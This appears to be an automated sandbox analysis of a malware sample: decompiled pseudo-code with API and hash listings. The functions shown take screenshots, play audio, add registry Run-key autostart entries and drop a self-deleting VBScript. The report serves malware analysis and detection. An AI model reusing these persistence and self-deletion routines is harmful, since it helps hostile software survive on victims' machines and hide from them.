                              									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
                              									if(_t323 == 0) {
                              										L44:
                              										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
                              										if(_t246 != 0) {
                              											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                              										}
                              										goto L47;
                              									}
                              									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
                              									if(_t246 != 0) {
                              										goto L1;
                              									}
                              									goto L44;
                              								}
                              								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
                              								if(_t246 != 0) {
                              									goto L1;
                              								}
                              								goto L42;
                              							}
                              							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
                              							if(_t246 != 0) {
                              								goto L1;
                              							}
                              							goto L40;
                              						}
                              						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
                              						if(_t325 == 0) {
                              							L29:
                              							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
                              							if(_t327 == 0) {
                              								L31:
                              								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
                              								if(_t329 == 0) {
                              									L33:
                              									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
                              									if(_t246 != 0) {
                              										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                              									}
                              									goto L36;
                              								}
                              								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
                              								if(_t246 != 0) {
                              									goto L1;
                              								}
                              								goto L33;
                              							}
                              							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
                              							if(_t246 != 0) {
                              								goto L1;
                              							}
                              							goto L31;
                              						}
                              						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
                              						if(_t246 != 0) {
                              							goto L1;
                              						}
                              						goto L29;
                              					}
                              					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
                              					if(_t331 == 0) {
                              						L18:
                              						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
                              						if(_t333 == 0) {
                              							L20:
                              							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
                              							if(_t335 == 0) {
                              								L22:
                              								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
                              								if(_t246 != 0) {
                              									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                              								}
                              								goto L25;
                              							}
                              							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
                              							if(_t246 != 0) {
                              								goto L1;
                              							}
                              							goto L22;
                              						}
                              						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
                              						if(_t246 != 0) {
                              							goto L1;
                              						}
                              						goto L20;
                              					}
                              					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
                              					if(_t246 != 0) {
                              						goto L1;
                              					}
                              					goto L18;
                              				} else {
                              					__edi =  *(__esi - 0x1f) & 0x000000ff;
                              					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                              					if(__edi == 0) {
                              						L7:
                              						__edi =  *(__esi - 0x1e) & 0x000000ff;
                              						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                              						if(__edi == 0) {
                              							L9:
                              							__edi =  *(__esi - 0x1d) & 0x000000ff;
                              							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                              							if(__edi == 0) {
                              								L11:
                              								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                              								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                              								if(__ecx != 0) {
                              									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                              								}
                              								goto L14;
                              							}
							__ecx = (0 | __edi > 0x00000000) * 2 - 1;
							if(__ecx != 0) {
                              								goto L1;
                              							}
                              							goto L11;
                              						}
						__ecx = (0 | __edi > 0x00000000) * 2 - 1;
						if(__ecx != 0) {
                              							goto L1;
                              						}
                              						goto L9;
                              					}
					__ecx = (0 | __edi > 0x00000000) * 2 - 1;
					if(__ecx != 0) {
                              						goto L1;
                              					}
                              					goto L7;
                              				}
                              				L1:
                              				_t197 = _t246;
                              				return _t197;
                              			}

                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                              • Instruction ID: 408e5dc9d1f9a891ea97fd5a4050b58cd4f2d4fd4c8bb63a7fc0ce09d4585151
                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                              • Instruction Fuzzy Hash: 84C1E9722050934ADF2D4A39C43517FBAA15EE67B271A236FD4F2CB2C4EE18E624D614
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E004142A5(void* __ecx, char __edx, void* __eflags, signed int _a4) {
                              				void* _v12;
                              				char _v13;
                              				struct HDC__* _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				int _v32;
                              				int _v36;
                              				struct HDC__* _v40;
                              				void* _v46;
                              				intOrPtr _v50;
                              				intOrPtr _v54;
                              				char _v56;
                              				char _v80;
                              				intOrPtr _v84;
                              				struct tagCURSORINFO _v100;
                              				signed int _v106;
                              				signed int _v108;
                              				long _v116;
                              				long _v120;
                              				char _v124;
                              				struct _ICONINFO _v144;
                              				char _v168;
                              				void* __ebx;
                              				int _t114;
                              				void* _t115;
                              				void* _t116;
                              				void* _t120;
                              				int _t127;
                              				void* _t128;
                              				signed char _t140;
                              				long _t146;
                              				void* _t147;
                              				int _t149;
                              				void* _t157;
                              				void* _t186;
                              				void* _t188;
                              				void* _t194;
                              				int _t199;
                              				void* _t204;
                              				void* _t223;
                              				signed int _t226;
                              				struct HDC__* _t228;
                              				struct HDC__* _t232;
                              				struct tagBITMAPINFO* _t234;
                              				void* _t235;
                              				int _t241;
                              
                              				_v13 = __edx;
                              				_t194 = __ecx;
                              				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
                              				_v20 = _t232;
                              				_t228 = CreateCompatibleDC(_t232);
                              				_v40 = _t228;
                              				_v32 = L004146DC( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
                              				_t114 = L00414728( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
                              				_t199 = _v32;
                              				_v36 = _t114;
                              				if(_t199 != 0 || _t114 != 0) {
                              					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
                              					_v12 = _t115;
                              					__eflags = _t115;
                              					if(_t115 != 0) {
                              						_t116 = SelectObject(_t228, _t115);
                              						__eflags = _t116;
                              						if(_t116 != 0) {
                              							_v28 = _v28 & 0x00000000;
                              							_v24 = _v24 & 0x00000000;
                              							L00414769( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
                              							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
                              							__eflags = _t120;
                              							if(_t120 == 0) {
                              								goto L7;
                              							}
                              							__eflags = _v13;
                              							if(_v13 != 0) {
                              								_v100.cbSize = 0x14;
                              								_t186 = GetCursorInfo( &_v100);
                              								__eflags = _t186;
                              								if(_t186 != 0) {
                              									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
                              									__eflags = _t188;
                              									if(_t188 != 0) {
                              										_t241 = _v84 - _v144.yHotspot - _v24;
                              										__eflags = _t241;
                              										DeleteObject(_v144.hbmColor);
                              										DeleteObject(_v144.hbmMask);
                              										_t228 = _v40;
                              										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
                              										_t232 = _v20;
                              									}
                              								}
                              							}
                              							_push( &_v124);
                              							_t127 = 0x18;
                              							_t128 = GetObjectA(_v12, _t127, ??);
                              							__eflags = _t128;
                              							if(_t128 == 0) {
                              								goto L7;
                              							} else {
                              								_t226 = _v106 * _v108 & 0x0000ffff;
                              								__eflags = _t226 - 1;
                              								if(_t226 != 1) {
                              									_push(4);
                              									_pop(1);
                              									_a4 = 1;
                              									__eflags = _t226 - 1;
                              									if(_t226 <= 1) {
                              										L24:
                              										__eflags = 1 << 1;
                              										_push(0x2eb6edc);
                              										L25:
                              										_t234 = LocalAlloc(0x40, ??);
                              										_t204 = 0x18;
                              										_t234->bmiHeader = 0x28;
                              										_t234->bmiHeader.biWidth = _v120;
                              										_t234->bmiHeader.biHeight = _v116;
                              										_t234->bmiHeader.biPlanes = _v108;
                              										_t234->bmiHeader.biBitCount = _v106;
                              										_t140 = _a4;
                              										__eflags = _t140 - _t204;
                              										if(_t140 < _t204) {
                              											__eflags = 1;
                              											_t234->bmiHeader.biClrUsed = 1 << _t140;
                              										}
                              										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
                              										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
                              										asm("cdq");
                              										_t227 = _t226 & 0x00000007;
                              										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
                              										_t234->bmiHeader.biSizeImage = _t146;
                              										_t147 = GlobalAlloc(0, _t146);
                              										_a4 = _t147;
                              										__eflags = _t147;
                              										if(_t147 != 0) {
                              											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
                              											__eflags = _t149;
                              											if(_t149 != 0) {
                              												_v56 = 0x4d42;
                              												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                              												_v50 = 0;
                              												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
                              												__eflags = _t157;
                              												_v46 = _t157;
                              												E004020B5(_t194,  &_v80);
                              												E004020B5(_t194,  &_v168);
                              												L004024FD(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
                              												L00403416( &_v80);
                              												L004024FD(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
                              												L00403416( &_v80);
                              												_t235 = _a4;
                              												L004024FD(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
                              												L00403416( &_v80);
                              												DeleteObject(_v12);
                              												GlobalFree(_t235);
                              												DeleteDC(_v20);
                              												DeleteDC(_t228);
                              												E00402024(_t194, _t194, __eflags,  &_v168);
                              												L00401FA7();
                              												L00401FA7();
                              												goto L32;
                              											}
                              											DeleteDC(_v20);
                              											DeleteDC(_t228);
                              											DeleteObject(_v12);
                              											GlobalFree(_a4);
                              											goto L2;
                              										} else {
                              											_push(_v20);
                              											L8:
                              											DeleteDC();
                              											DeleteDC(_t228);
                              											_push(_v12);
                              											goto L5;
                              										}
                              									}
                              									_push(8);
                              									_pop(1);
                              									_a4 = 1;
                              									__eflags = _t226 - 1;
                              									if(_t226 <= 1) {
                              										goto L24;
                              									}
                              									_push(0x10);
                              									_pop(1);
                              									_a4 = 1;
                              									__eflags = _t226 - 1;
                              									if(_t226 <= 1) {
                              										goto L24;
                              									}
                              									_t223 = 0x18;
                              									__eflags = _t226 - _t223;
                              									if(_t226 > _t223) {
                              										_push(0x20);
                              										_pop(1);
                              										L23:
                              										_a4 = 1;
                              										goto L24;
                              									}
                              									_a4 = _t223;
                              									_push(0x28);
                              									goto L25;
                              								}
                              								goto L23;
                              							}
                              						}
                              						L7:
                              						_push(_t232);
                              						goto L8;
                              					} else {
                              						DeleteDC(_t232);
                              						DeleteDC(_t228);
                              						_push(0);
                              						L5:
                              						DeleteObject();
                              						goto L2;
                              					}
                              				} else {
                              					L2:
                              					E00402064(_t194, _t194, 0x45f6ac);
                              					L32:
                              					return _t194;
                              				}
                              			}
                              Instruction addresses (address column of the listing above, in listing order):
                              0x004142b3 0x004142be 0x004142c6 0x004142c9 0x004142d5 0x004142d7 0x004142e6 0x004142f3 0x004142f8 0x004142fb
                              0x00414300 0x0041431a 0x00414320 0x00414323 0x00414325 0x0041433f 0x00414345 0x00414347 0x00414360 0x00414364
                              0x0041436f 0x0041438f 0x00414395 0x00414397 0x00000000 0x00000000 0x00414399 0x0041439d 0x004143a2 0x004143aa
                              0x004143b0 0x004143b2 0x004143be 0x004143c4 0x004143c6 0x004143e0 0x004143e0 0x004143e3 0x004143ec 0x004143f7
                              0x004143fb 0x00414401 0x00414401 0x004143c6 0x004143b2 0x00414407 0x0041440a 0x0041440f 0x00414415 0x00414417
                              0x00000000 0x0041441d 0x00414424 0x0041442a 0x0041442d 0x00414433 0x00414435 0x00414436 0x00414439 0x0041443c
                              0x00414469 0x00414469 0x00414472 0x00414473 0x0041447b 0x0041447f 0x00414480 0x00414489 0x0041448f 0x00414496
                              0x0041449e 0x004144a2 0x004144a5 0x004144a8 0x004144af 0x004144b1 0x004144b1 0x004144bd 0x004144c1 0x004144c5
                              0x004144c6 0x004144d4 0x004144db 0x004144de 0x004144e4 0x004144e7 0x004144e9 0x00414502 0x00414508 0x0041450a
                              0x00414537 0x0041454b 0x00414550 0x0041455b 0x0041455b 0x00414561 0x00414564 0x0041456f 0x0041457d 0x0041458c
                              0x00414597 0x004145a6 0x004145ae 0x004145b5 0x004145c4 0x004145cc 0x004145d3 0x004145e2 0x004145e5 0x004145f0
                              0x004145fb 0x00414603 0x00000000 0x00414603 0x00414515 0x00414518 0x0041451d 0x00414527 0x00000000 0x004144eb
                              0x004144eb 0x0041434a 0x00414350 0x00414353 0x00414355 0x00000000 0x00414355 0x004144e9 0x0041443e 0x00414440
                              0x00414441 0x00414444 0x00414447 0x00000000 0x00000000 0x00414449 0x0041444b 0x0041444c 0x0041444f 0x00414452
                              0x00000000 0x00000000 0x00414456 0x00414457 0x0041445a 0x00414463 0x00414465 0x00414466 0x00414466 0x00000000
                              0x00414466 0x0041445c 0x0041445f 0x00000000 0x0041445f 0x00000000 0x0041442f 0x00414417 0x00414349 0x00414349
                              0x00000000 0x00414327 0x0041432e 0x00414331 0x00414333 0x00414335 0x00414335 0x00000000 0x00414335 0x00414306
                              0x00414306 0x0041430d 0x0041460a 0x00414610 0x00414610

                              APIs
                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004142C0
                              • CreateCompatibleDC.GDI32(00000000), ref: 004142CC
                                • Part of subcall function 004146DC: GetMonitorInfoW.USER32(?,?), ref: 004146FC
                                • Part of subcall function 00414728: GetMonitorInfoW.USER32(?,?), ref: 00414748
                              • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041431A
                              • DeleteDC.GDI32(00000000), ref: 0041432E
                              • DeleteDC.GDI32(00000000), ref: 00414331
                              • DeleteObject.GDI32(?), ref: 00414335
                              • SelectObject.GDI32(00000000,00000000), ref: 0041433F
                              • DeleteDC.GDI32(00000000), ref: 00414350
                              • DeleteDC.GDI32(00000000), ref: 00414353
                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041438F
                              • GetCursorInfo.USER32(?,?,?), ref: 004143AA
                              • GetIconInfo.USER32(?,?), ref: 004143BE
                              • DeleteObject.GDI32(?), ref: 004143E3
                              • DeleteObject.GDI32(?), ref: 004143EC
                              • DrawIcon.USER32 ref: 004143FB
                              • GetObjectA.GDI32(?,00000018,?), ref: 0041440F
                              • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414475
                              • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 004144DE
                              • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414502
                              • DeleteDC.GDI32(?), ref: 00414515
                              • DeleteDC.GDI32(00000000), ref: 00414518
                              • DeleteObject.GDI32(?), ref: 0041451D
                              • GlobalFree.KERNEL32 ref: 00414527
                              • DeleteObject.GDI32(?), ref: 004145CC
                              • GlobalFree.KERNEL32 ref: 004145D3
                              • DeleteDC.GDI32(?), ref: 004145E2
                              • DeleteDC.GDI32(00000000), ref: 004145E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Delete$Object$Info$CreateGlobal$AllocCompatibleFreeIconMonitor$BitmapBitsCursorDrawLocalSelectStretch
                              • String ID: DISPLAY$d?A
                              • API String ID: 517350757-979833423
                              • Opcode ID: cb00ee02b850786815a41c7fce795d2d79e314af86b36145e7d8f5b216eac82f
                              • Instruction ID: 5f48c5219878f18165c8a10fe86ed1b3fa979366dd0a80e665ef025d0f654af7
                              • Opcode Fuzzy Hash: cb00ee02b850786815a41c7fce795d2d79e314af86b36145e7d8f5b216eac82f
                              • Instruction Fuzzy Hash: 1AB18075A00319AFDB10DFA0DC45BEEBBB8EF44752F00402AF945E7291DB74AA85CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E0041636B(void* __ecx, void* __edx, char _a4) {
                              				char _v24;
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				char _v124;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t25;
                              				void* _t28;
                              				void* _t43;
                              				void* _t60;
                              				void* _t63;
                              				void* _t67;
                              				CHAR* _t89;
                              				void* _t109;
                              				CHAR* _t110;
                              				void* _t111;
                              				void* _t114;
                              				void* _t118;
                              
                              				_t103 = __edx;
                              				_t67 = __ecx;
                              				_t109 = __edx;
                              				if(L004165B1( &_a4, __ecx, __ecx) == 0xffffffff) {
                              					_t63 = L00401ECB( &_a4);
                              					_t103 = 0x30;
                              					L00401EDA( &_a4, 0x30, _t111, E004179B3( &_v28, 0x30, _t63));
                              					L00401ED0();
                              				}
                              				_t25 = L00402469();
                              				_t120 = _t25;
                              				if(_t25 == 0) {
                              					__eflags = PathFileExistsW(L00401ECB( &_a4));
                              					if(__eflags != 0) {
                              						goto L4;
                              					} else {
                              						E00402064(_t67, _t114 - 0x18, 0x45f6ac);
                              						_push(0xa8);
                              						L00404A6E(_t67, 0x46ca00, _t103, __eflags);
                              					}
                              				} else {
                              					_t60 = L00401ECB( &_a4);
                              					_t118 = _t114 - 0x18;
                              					E004020CC(_t67, _t118, _t103, _t120, _t109);
                              					L004173A6(_t60);
                              					_t114 = _t118 + 0x18;
                              					L4:
                              					_t28 = L00416C32( &_v124, _t67);
                              					_t108 = E00403010( &_v28, E00403086(_t67,  &_v76, L00409E6B( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
                              					E00403086(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
                              					L00401ED0();
                              					L00401ED0();
                              					L00401ED0();
                              					L00401ED0();
                              					mciSendStringW(L00401ECB( &_v52), 0, 0, 0);
                              					mciSendStringA("play audio", 0, 0, 0);
                              					_t115 = _t114 - 0x18;
                              					E00402064(0, _t114 - 0x18, 0x45f6ac);
                              					_push(0xa9);
                              					L00404A6E(0, 0x46ca00, _t32, 0);
                              					_t43 = CreateEventA(0, 1, 0, 0);
                              					while(1) {
                              						L5:
                              						 *0x46bea8 = _t43;
                              						while(1) {
                              							_t122 = _t43;
                              							if(_t43 == 0) {
                              								break;
                              							}
                              							__eflags =  *0x46bea6; // 0x0
                              							if(__eflags != 0) {
                              								mciSendStringA("pause audio", 0, 0, 0);
                              								 *0x46bea6 = 0;
                              							}
                              							__eflags =  *0x46bea5; // 0x0
                              							if(__eflags != 0) {
                              								mciSendStringA("resume audio", 0, 0, 0);
                              								 *0x46bea5 = 0;
                              							}
                              							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
                              							_t108 =  &_v24;
                              							_t110 = "stopped";
                              							_t89 = 0;
                              							while(1) {
                              								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
                              								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
                              									break;
                              								}
                              								_t89 = _t89 + 1;
                              								__eflags = _t89 - 8;
                              								if(_t89 != 8) {
                              									continue;
                              								} else {
                              									SetEvent( *0x46bea8);
                              								}
                              								break;
                              							}
                              							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
                              							if(__eflags != 0) {
                              								_t43 =  *0x46bea8; // 0x0
                              							} else {
                              								CloseHandle( *0x46bea8);
                              								_t43 = 0;
                              								goto L5;
                              							}
                              						}
                              						mciSendStringA("stop audio", 0, 0, 0);
                              						mciSendStringA("close audio", 0, 0, 0);
                              						E00402064(0, _t115 - 0x18, 0x45f6ac);
                              						_push(0xaa);
                              						L00404A6E(0, 0x46ca00, _t108, _t122);
                              						L00401ED0();
                              						goto L21;
                              					}
                              				}
                              				L21:
                              				return L00401ED0();
                              			}

                              Instruction addresses (address column of the listing above, in listing order):
                              0x0041636b 0x00416375 0x00416377 0x00416385 0x0041638a 0x00416390 0x0041639f 0x004163a7 0x004163a7 0x004163ae
                              0x004163b6 0x004163b8 0x004164a5 0x004164a7 0x00000000 0x004164ad 0x004164b7 0x004164bc 0x004164c6 0x004164c6
                              0x004163be 0x004163be 0x004163c3 0x004163cb 0x004163d2 0x004163d7 0x004163da 0x004163e4 0x00416417 0x0041641c
                              0x00416425 0x0041642d 0x00416435 0x0041643d 0x00416450 0x00416464 0x00416466 0x00416470 0x00416475 0x0041647f
                              0x00416489 0x0041648f 0x0041648f 0x0041648f 0x00416560 0x00416560 0x00416562 0x00000000 0x00000000 0x004164d0
                              0x004164d6 0x004164e0 0x004164e2 0x004164e2 0x004164e8 0x004164ee 0x004164f8 0x004164fa 0x004164fa 0x0041650c
                              0x0041650e 0x00416511 0x00416516 0x00416518 0x0041651c 0x0041651f 0x00000000 0x00000000 0x00416521 0x00416522
                              0x00416525 0x00000000 0x00416527 0x0041652d 0x0041652d 0x00000000 0x00416525 0x00416544 0x00416546 0x0041655b
                              0x00416548 0x0041654e 0x00416554 0x00000000 0x00416554 0x00416546 0x00416570 0x0041657a 0x00416586 0x0041658b
                              0x00416595 0x0041659d 0x00000000 0x0041659d 0x0041648f 0x004165a2 0x004165b0

                              APIs
                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416450
                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416464
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6AC), ref: 00416489
                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 0041649F
                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 004164E0
                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 004164F8
                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041650C
                              • SetEvent.KERNEL32 ref: 0041652D
                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041653E
                              • CloseHandle.KERNEL32 ref: 0041654E
                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416570
                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041657A
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                              • API String ID: 738084811-1354618412
                              • Opcode ID: a648e62bf9a57e1a7cf6fa9e7c23b293d4edcd21ed1639a470945636812c86c5
                              • Instruction ID: c8fb6d8f14581896d3eba004d9fbc9f1a09e24d5ac4ccc55cdd35aae18883956
                              • Opcode Fuzzy Hash: a648e62bf9a57e1a7cf6fa9e7c23b293d4edcd21ed1639a470945636812c86c5
                              • Instruction Fuzzy Hash: 4C51B4716002087AD714BB75DC96DFF3A6DDA50389F14003FF501A61E2EE788E8586AE
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E0040B107() {
                              				char _v28;
                              				char _v52;
                              				char _v76;
                              				char _v100;
                              				char _v124;
                              				char _v148;
                              				short _v668;
                              				void* _t49;
                              				void* _t50;
                              				void* _t53;
                              				void* _t56;
                              				void* _t82;
                              				void* _t84;
                              				void* _t85;
                              				signed char _t123;
                              				signed char _t124;
                              				void* _t227;
                              				void* _t229;
                              				void* _t230;
                              				void* _t231;
                              
                              				L0040FB4B();
                              				if( *0x46a9d4 != 0x30) {
                              					L00409D75();
                              				}
                              				_t227 =  *0x46bd6b - 1; // 0x0
                              				if(_t227 == 0) {
                              					L00414D1D(_t227);
                              				}
                              				if( *0x46ba75 != 0) {
                              					E004170AC(L00401ECB(0x46c0e0));
                              				}
                              				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                              				_t229 =  *0x46bb06 - 1; // 0x1
                              				if(_t229 == 0) {
                              					L0041074C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401ECB(0x46c4e8));
                              				}
                              				_t230 =  *0x46baff - 1; // 0x0
                              				if(_t230 == 0) {
                              					L0041074C(0x80000002, _t214, L00401ECB(0x46c4e8));
                              				}
                              				_t231 =  *0x46bb04 - 1; // 0x0
                              				if(_t231 == 0) {
                              					L0041074C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401ECB(0x46c4e8));
                              				}
                              				L00431810(0,  &_v668, 0, 0x208);
                              				_t49 = L00402469();
                              				_t50 = L00401F75(0x46c560);
                              				_t53 = L00410420(L00401F75(0x46c518), "exepath",  &_v668, 0x208, _t50, _t49);
                              				_t232 = _t53;
                              				if(_t53 == 0) {
                              					GetModuleFileNameW(0,  &_v668, 0x208);
                              				}
                              				RegDeleteKeyA(0x80000001, L00401F75(0x46c518));
                              				_t56 = L004074E6(_t232);
                              				_t233 = _t56;
                              				if(_t56 != 0) {
                              					SetFileAttributesW(L00401ECB(0x46c530), 0x80);
                              				}
                              				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
                              				asm("sbb bl, bl");
                              				E00403086(_t123,  &_v148, L00416C32( &_v76, L004169EB( &_v28)), 0, _t233, L".vbs");
                              				L00401ED0();
                              				L00401FA7();
                              				L00404409(_t123,  &_v124, E00403086(_t123,  &_v28, E0040425F(_t123,  &_v76, E0043918F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
                              				L00401ED0();
                              				L00401ED0();
                              				E004043E5(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040425F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                              				L00401ED0();
                              				_t124 = _t123 & 0x00000001;
                              				_t234 = _t124;
                              				if(_t124 != 0) {
                              					E004032F1(E00403086(_t124,  &_v28, E004043E5(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040425F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
                              					L00401ED0();
                              					L00401ED0();
                              					L00401ED0();
                              				}
                              				E004032F1(E00403086(_t124,  &_v100, E00403086(_t124,  &_v28, E0040425F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
                              				L00401ED0();
                              				L00401ED0();
                              				L00401ED0();
                              				_t235 = _t124;
                              				if(_t124 != 0) {
                              					L0040766E(_t124,  &_v52, 0, L"wend\n");
                              				}
                              				_t82 = L004074E6(_t235);
                              				_t236 = _t82;
                              				if(_t82 != 0) {
                              					E004032F1(E00403086(0x45f714,  &_v100, L00409E6B( &_v28, L"fso.DeleteFolder \"", _t236, 0x46c530), 0, _t236, L"\"\n"));
                              					L00401ED0();
                              					L00401ED0();
                              				}
                              				L0040766E(0x45f714,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                              				_t84 = L00401ECB( &_v124);
                              				_t85 = L00402469();
                              				if(E0041729F(L00401ECB( &_v52), _t85 + _t85, _t84, 0) != 0) {
                              					ShellExecuteW(0, L"open", L00401ECB( &_v124), 0x45f714, 0x45f714, 0);
                              				}
                              				ExitProcess(0);
                              			}

                              Disassembly listing for 0x0040b113 - 0x0040b45e (only the instruction address column survived extraction; see the API references below for the calls made from this range)

                              APIs
                                • Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,0046C500,0040D57C), ref: 0040FB5B
                                • Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF), ref: 0040FB6E
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,0046C518,0046C500), ref: 0040B211
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B224
                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040B252
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040B260
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(0040884D,00000000,0046C500,0040B126,?,0046C518,0046C500), ref: 00409D84
